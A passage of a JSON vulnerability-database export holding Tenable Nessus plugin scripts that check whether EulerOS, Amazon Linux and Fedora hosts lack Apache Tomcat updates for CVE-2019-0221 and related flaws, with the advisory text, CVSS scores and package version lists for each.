"p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1885.NASL", "href": "https://www.tenable.com/plugins/nessus/128808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128808);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"EulerOS 2.0 SP5 : tomcat (EulerOS-SA-2019-1885)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to\n 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes\n user provided data without escaping and is, therefore,\n vulnerable to XSS. SSI is disabled by default. The\n printenv command is intended for debugging and is\n unlikely to be present in a production\n website.(CVE-2019-0221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1885\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5374bbfe\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-admin-webapps-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-el-2.2-api-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-jsp-2.2-api-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-lib-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-servlet-3.0-api-7.0.76-8.h5.eulerosv2r7\",\n \"tomcat-webapps-7.0.76-8.h5.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T15:20:34", "description": "The SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. (CVE-2019-0221)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-07-26T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat7 (ALAS-2019-1235)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1235.NASL", "href": "https://www.tenable.com/plugins/nessus/127063", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1235.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127063);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-0221\");\n script_xref(name:\"ALAS\", value:\"2019-1235\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2019-1235)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The SSI printenv command in Apache Tomcat echoes user provided data\nwithout escaping and is, therefore, vulnerable to XSS. SSI is disabled\nby default. The printenv command is intended for debugging and is\nunlikely to be present in a production website. (CVE-2019-0221)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1235.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.94-1.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.94-1.35.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T15:28:03", "description": "According to the versions of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\n - When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g.\n redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.(CVE-2018-11784)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-09-24T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2019-2047)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2047.NASL", "href": "https://www.tenable.com/plugins/nessus/129240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129240);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2019-2047)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to\n 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes\n user provided data without escaping and is, therefore,\n vulnerable to XSS. SSI is disabled by default. The\n printenv command is intended for debugging and is\n unlikely to be present in a production\n website.(CVE-2019-0221)\n\n - When the default servlet in Apache Tomcat versions\n 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to\n 7.0.90 returned a redirect to a directory (e.g.\n redirecting to '/foo/' when the user requested '/foo')\n a specially crafted URL could be used to cause the\n redirect to be generated to any URI of the attackers\n choice.(CVE-2018-11784)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2047\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cfea0ee3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-8.h4\",\n \"tomcat-admin-webapps-7.0.76-8.h4\",\n \"tomcat-el-2.2-api-7.0.76-8.h4\",\n \"tomcat-jsp-2.2-api-7.0.76-8.h4\",\n \"tomcat-lib-7.0.76-8.h4\",\n \"tomcat-servlet-3.0-api-7.0.76-8.h4\",\n \"tomcat-webapps-7.0.76-8.h4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-24T14:54:01", "description": "This update includes a rebase from 9.0.13 up to 9.0.21 which resolves two CVEs along with various other bugs/features :\n\n - rhbz#1673856 tomcat-9.0.21 is available\n\n - rhbz#1713279 CVE-2019-0221 tomcat: XSS in SSI printenv\n\n - rhbz#1693326 CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-06-25T00:00:00", "type": "nessus", "title": "Fedora 30 : 1:tomcat (2019-1a3f878d27)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-1A3F878D27.NASL", "href": "https://www.tenable.com/plugins/nessus/126225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-1a3f878d27.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126225);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_xref(name:\"FEDORA\", value:\"2019-1a3f878d27\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Fedora 30 : 1:tomcat (2019-1a3f878d27)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update includes a rebase from 9.0.13 up to 9.0.21 which resolves\ntwo CVEs along with various other bugs/features :\n\n - rhbz#1673856 tomcat-9.0.21 is available\n\n - rhbz#1713279 CVE-2019-0221 tomcat: XSS in SSI printenv\n\n - rhbz#1693326 CVE-2019-0199 tomcat: Apache Tomcat HTTP/2\n DoS\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-1a3f878d27\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 1:tomcat package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif 